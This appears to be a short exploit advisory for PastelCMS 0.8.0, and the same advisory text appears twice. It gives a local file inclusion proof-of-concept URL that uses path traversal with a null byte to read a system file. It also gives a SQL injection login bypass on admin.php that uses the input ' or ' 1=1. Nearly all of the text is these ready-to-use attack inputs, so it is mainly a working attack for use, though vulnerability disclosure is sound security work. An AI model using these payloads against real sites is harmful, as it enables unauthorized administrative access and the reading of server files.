PastelCMS version 0.8.0 suffers from remote SQL injection and local file inclusion vulnerabilities.
7e15ce7dee26edca6208804e924ab4d9b1b0dec4580fbf12cfc96877caab9ac7
#########################################################################
[+] PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#########################################################################
[+] Download : http://pastel.pri.ee/?id=58
[+] Local File Inclusion
PoC :
http://127.0.0.1/[path]/?set_lng=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection ( Login Bypass)
- Go to :
http://127.0.0.1/[path]/admin.php
- Login as the following :
Username : [REAL ADMIN USERNAME HERE] ' or ' 1=1
Password : anything
#########################################################################
#########################################################################
[+] PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#########################################################################
[+] Download : http://pastel.pri.ee/?id=58
[+] Local File Inclusion
PoC :
http://127.0.0.1/[path]/?set_lng=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection ( Login Bypass)
- Go to :
http://127.0.0.1/[path]/admin.php
- Login as the following :
Username : [REAL ADMIN USERNAME HERE] ' or ' 1=1
Password : anything
#########################################################################